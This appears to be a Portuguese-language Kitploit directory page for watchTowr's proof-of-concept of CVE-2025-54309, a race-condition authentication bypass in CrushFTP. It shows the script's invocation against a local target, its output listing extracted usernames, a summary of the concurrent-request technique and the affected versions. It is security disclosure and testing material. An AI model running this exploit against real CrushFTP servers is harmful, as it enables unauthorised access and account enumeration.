Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309 — Exploit de prova de conceito para CVE-2025-54309, demonstrando um bypass de autenticação por condição de corrida no CrushFTP WebInterface para enumerar usuários. | Kitploit
Ferramentas/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de PenetraçãoAutenticação
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

Exploit de prova de conceito para CVE-2025-54309, demonstrando um bypass de autenticação por condição de corrida no CrushFTP WebInterface para enumerar usuários.

Ver Repositório
2832há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-54309

Um Proof of Concept de Bypass de Autenticação CrushFTP

Veja nosso blog post para detalhes técnicos

Detection in Action

root@kitploit:~
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

Descrição

Este script é uma prova de conceito para CVE-2025-54309 contra interfaces CrushFTP. Ao criar um conjunto de requisições concorrentes compartilhando os mesmos identificadores de sessão, uma requisição para definir a propriedade de nome de usuário como "crushadmin" e uma requisição para executar um comando autenticado como este usuário, é possível neste PoC extrair a lista de nomes de usuários. Mais detalhes são descritos em nosso [blog post] (https://labs.watchtowr.com/).

Versões Afetadas

  • antes de 10.8.5
  • 11 antes de 11.3.4_23

Mais detalhes em CrushFTP Advisory

Siga o watchTowr Labs

Para as pesquisas de segurança mais recentes, siga a equipe dos watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Baixar ferramenta